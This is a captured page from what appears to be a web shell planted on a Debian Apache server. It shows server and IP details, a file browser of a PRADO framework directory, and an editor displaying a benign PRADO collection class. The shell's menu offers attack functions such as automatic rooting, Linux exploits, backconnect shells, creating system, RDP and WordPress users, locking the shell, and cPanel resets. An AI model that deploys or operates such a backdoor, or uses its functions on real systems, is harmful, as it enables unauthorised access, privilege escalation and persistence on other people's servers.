Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.131.37.82
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Collections /
[ HOME SHELL ]
Name
Size
Permission
Action
IPriorityItem.php
594
B
-rw-r--r--
TAttributeCollection.php
5.45
KB
-rw-r--r--
TDummyDataSource.php
1.49
KB
-rw-r--r--
TDummyDataSourceIterator.php
1.83
KB
-rw-r--r--
TList.php
10.73
KB
-rw-r--r--
TListItemCollection.php
4.52
KB
-rw-r--r--
TMap.php
7.76
KB
-rw-r--r--
TPagedDataSource.php
6.32
KB
-rw-r--r--
TPagedList.php
9.64
KB
-rw-r--r--
TPagedListFetchDataEventParame...
1.93
KB
-rw-r--r--
TPagedListIterator.php
2.21
KB
-rw-r--r--
TPagedListPageChangedEventPara...
1.03
KB
-rw-r--r--
TPagedMapIterator.php
2.37
KB
-rw-r--r--
TPriorityList.php
26.44
KB
-rw-r--r--
TPriorityMap.php
17.31
KB
-rw-r--r--
TQueue.php
4.1
KB
-rw-r--r--
TQueueIterator.php
1.92
KB
-rw-r--r--
TStack.php
3.99
KB
-rw-r--r--
TWeakCallableCollection.php
11.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TAttributeCollection.php
<?php /** * TAttributeCollection classes * * @author Qiang Xue <qiang.xue@gmail.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Collections; use Prado\TPropertyValue; /** * TAttributeCollection class * * TAttributeCollection implements a collection for storing attribute names and values. * * Besides all functionalities provided by {@link TMap}, TAttributeCollection * allows you to get and set attribute values like getting and setting * properties. For example, the following usages are all valid for a * TAttributeCollection object: * <code> * $collection->Text='text'; * echo $collection->Text; * </code> * They are equivalent to the following: * <code> * $collection->add('Text','text'); * echo $collection->itemAt('Text'); * </code> * * Note, attribute names are case-insensitive. They are converted to lower-case * in the collection storage. * * @author Qiang Xue <qiang.xue@gmail.com> * @since 3.0 */ class TAttributeCollection extends TMap { protected $_caseSensitive = false; /** * Returns an array with the names of all variables of this object that should NOT be serialized * because their value is the default one or useless to be cached for the next page loads. * Reimplement in derived classes to add new variables, but remember to also to call the parent * implementation first. * @param array $exprops by reference */ protected function _getZappableSleepProps(&$exprops) { parent::_getZappableSleepProps($exprops); if ($this->_caseSensitive === false) { $exprops[] = "\0*\0_caseSensitive"; } } /** * Returns a property value or an event handler list by property or event name. * This method overrides the parent implementation by returning * a key value if the key exists in the collection. * @param string $name the property name or the event name * @throws \Prado\Exceptions\TInvalidOperationException if the property/event is not defined. * @return mixed the property value or the event handler list */ public function __get($name) { return $this->contains($name) ? $this->itemAt($name) : parent::__get($name); } /** * Sets value of a component property. * This method overrides the parent implementation by adding a new key value * to the collection. * @param string $name the property name or event name * @param mixed $value the property value or event handler * @throws \Prado\Exceptions\TInvalidOperationException If the property is not defined or read-only. */ public function __set($name, $value) { $this->add($name, $value); } /** * @return bool whether the keys are case-sensitive. Defaults to false. */ public function getCaseSensitive() { return $this->_caseSensitive; } /** * @param bool $value whether the keys are case-sensitive. */ public function setCaseSensitive($value) { $this->_caseSensitive = TPropertyValue::ensureBoolean($value); } /** * Returns the item with the specified key. * This overrides the parent implementation by converting the key to lower case first if CaseSensitive is false. * @param mixed $key the key * @return mixed the element at the offset, null if no element is found at the offset */ public function itemAt($key) { return parent::itemAt($this->_caseSensitive ? $key : strtolower($key)); } /** * Adds an item into the map. * This overrides the parent implementation by converting the key to lower case first if CaseSensitive is false. * @param mixed $key * @param mixed $value */ public function add($key, $value) { parent::add($this->_caseSensitive ? $key : strtolower($key), $value); } /** * Removes an item from the map by its key. * This overrides the parent implementation by converting the key to lower case first if CaseSensitive is false. * @param mixed $key the key of the item to be removed * @return mixed the removed value, null if no such key exists. */ public function remove($key) { return parent::remove($this->_caseSensitive ? $key : strtolower($key)); } /** * Returns whether the specified is in the map. * This overrides the parent implementation by converting the key to lower case first if CaseSensitive is false. * @param mixed $key the key * @return bool whether the map contains an item with the specified key */ public function contains($key) { return parent::contains($this->_caseSensitive ? $key : strtolower($key)); } /** * Determines whether a property is defined. * This method overrides parent implementation by returning true * if the collection contains the named key. * @param string $name the property name * @return bool whether the property is defined */ public function hasProperty($name) { return $this->contains($name) || parent::canGetProperty($name) || parent::canSetProperty($name); } /** * Determines whether a property can be read. * This method overrides parent implementation by returning true * if the collection contains the named key. * @param string $name the property name * @return bool whether the property can be read */ public function canGetProperty($name) { return $this->contains($name) || parent::canGetProperty($name); } /** * Determines whether a property can be set. * This method overrides parent implementation by always returning true * because you can always add a new value to the collection. * @param string $name the property name * @return bool true */ public function canSetProperty($name) { return true; } }
Close